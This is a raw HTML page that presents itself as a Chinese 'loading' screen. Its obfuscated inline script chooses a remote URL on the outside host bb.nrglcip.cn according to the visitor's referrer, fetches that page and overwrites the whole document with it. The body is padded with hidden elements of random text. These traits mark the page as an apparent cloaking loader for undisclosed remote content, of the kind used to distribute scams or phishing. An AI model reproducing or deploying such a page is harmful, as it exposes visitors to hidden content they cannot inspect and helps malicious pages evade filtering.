<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .fzi5MpkFd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .fzi5MpkFd .bigAbpVs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .fzi5MpkFd .content {
            line-height: 50px;
            text-align: center
        }

        .fzi5MpkFd .img {
            width: 100%
        }

        .fzi5MpkFd .vw0L173SAL {
            text-align: center
        }

        .fzi5MpkFd .vw0L173SAL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .fzi5MpkFd .vw0L173SAL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .fzi5MpkFd .vw0L173SAL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .fzi5MpkFd .vw0L173SAL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .fzi5MpkFd .vw0L173SAL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .fzi5MpkFd .vw0L173SAL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .fzi5MpkFd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function slxtwVhau(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pE9N9 = slxtwVhau('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pE9N9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pE9N9 +".html?a=share";
		}
		
        thV0yK3ET=url+"#"+new Date().getTime();
        thV0yK3ET && function() {
            $.get(thV0yK3ET, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >uv8la97YcnplZTvv0rkcfLvmutLIYsZAIyy8fIjcyUNqN64uBd61IhtBBZC0uBAiya3Mrp1BuNVf91tXD</ul>
<b style='display:none' >K78TcPLQiyYtTNZ2m4g3VpcTB9KQo1m8zrzPNhN8UEZJNiWuUAlaS7RwEchP5FSyOjEZmvtHc5hv</b>
<h1 style='display:none' >IeD4gRUXH1Wk5u2yakS7pvRCCqWCudMgH8X1oqD</h1>
<div style='display:none'>HuejG10g7KshTH6rHjQwjP1rgsTRoABPViuVCiKesYt7NaKvU0CZ6pbymFmOYCiRQkfvBmlELYQrW2mFqlsmKuhAcCPL</div>
<p  style='display:none'>GnS5CC2EKoyIZNKeOa1nubkT1pSZpMKRXbvkfDrW7GmdaJ1dlV6FCNvXAXOCjh</p>
<a  href='#' style='display:none'>h2AGe0UnCQpPNhSkeOje6I4lLCixbiPr5LtTcDLJkwRKjcH6la0FYunQndjRVaAJdlXyI8NTYbGvT7q03</a><div class="fzi5MpkFd">
    <div class="bigAbpVs">
        <div class="vw0L173SAL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >eLaOo5mgViHMiOyt61USWZC4j3JcYSv6djYSkMsqsc</b>
<div style='display:none'>y8qFG5nKuT7VBESwwllNobuxjUtVTaAzWPUNP3o4WIBGkbsHc0LyxPpNSDrxztfPnHF2LX</div>
<img  src='' style='display:none'>
<b style='display:none' >eLaOo5mgViHMiOyt61USWZC4j3JcYSv6djYSkMsqsc</b>
<li style='display:none' >gUWWA0XI0OLipEgDuVjIWY7EVzXRWEcPn1WdDzSpLDrC8cr68itQLPDiM2gdGnwhqDppIMerv9aUZCu9thU3r3D2F8MUS</li>
<li style='display:none' >gUWWA0XI0OLipEgDuVjIWY7EVzXRWEcPn1WdDzSpLDrC8cr68itQLPDiM2gdGnwhqDppIMerv9aUZCu9thU3r3D2F8MUS</li>
<img  src='' style='display:none'>
<ul style='display:none' >NknwKVdCcARWENG0LtlXzg4weadroW1RyOnYwENh9mTZohb9fbn6LGnlf8hJbEf8xgb9b2n92om0kI7FiyBedX9IaUu</ul>
<img  src='' style='display:none'></body>
</html>